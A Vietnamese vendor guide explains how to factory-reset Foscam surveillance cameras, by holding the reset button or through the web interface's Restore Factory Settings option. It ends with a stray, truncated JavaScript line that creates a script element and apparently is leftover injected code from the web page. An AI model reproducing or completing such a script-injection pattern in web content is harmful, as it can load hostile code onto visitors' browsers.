Hướng dẫn khôi phục cài đặt gốc camera quan sát Foscam.

Khi sử dụng camera quan sát Foscam, đôi khi bạn gặp phải những sự cố bất đắc dĩ như quên mật khẩu làm cho bạn không thể nào đăng nhập vào xem camera được hoặc lỡ tay chỉnh sai những thông số của camera. Những trường hợp này bắt buộc bạn phải khôi phục cài đặt gốc camera quan sát, sau đó mọi thông số của camera sẽ được trả về ban đầu và bạn sẽ cấu hình lại các thông số cho camera quan sát . Vậy làm thế nào để làm được chuyện này ?

Trường hợp 1 : Nếu bạn đặt mật khẩu cho camera mà lỡ quên mất thì chỉ còn 1 cách để khôi phục cài đặt gốc camera quan sát là nhấn và giữ nút reset ở chân đế camera trong khoảng 20s. 

khoi phuc cai dat goc camera quan sat Hướng dẫn khôi phục cài đặt gốc camera quan sát Foscam

 

Trường hợp 2 : Bạn còn đăng nhập được vào đường link để xem camera nhưng có vài thông số bạn chinh sai và muốn trả về cài đặt ban đầu. Lúc này bạn đăng nhập vào đượng link của camera, chọn Device Management -> chọn Restore Factory Settings -> chọn OK để tiến hành khôi phục cài dặt gốc camera quan sát.

huong dan khoi phuc cai dat goc camera quan sat 250x131 Hướng dẫn khôi phục cài đặt gốc camera quan sát Foscam

 

Trong quá trình khôi phục cài đặt gốc camera quan sát nếu phát hiện lỗi hay sự cố các bạn vui lòng thông báo trực tiếp cho chúng tôi qua email : support@huyenvu.vn để Huyền Vũ ghi nhận và phản hồi lại cho nhà sản xuất Foscam. Rất mong nhận được những đóng góp quí báu của các bạn.

 

var d=document;var s=d.createElement(‘script’);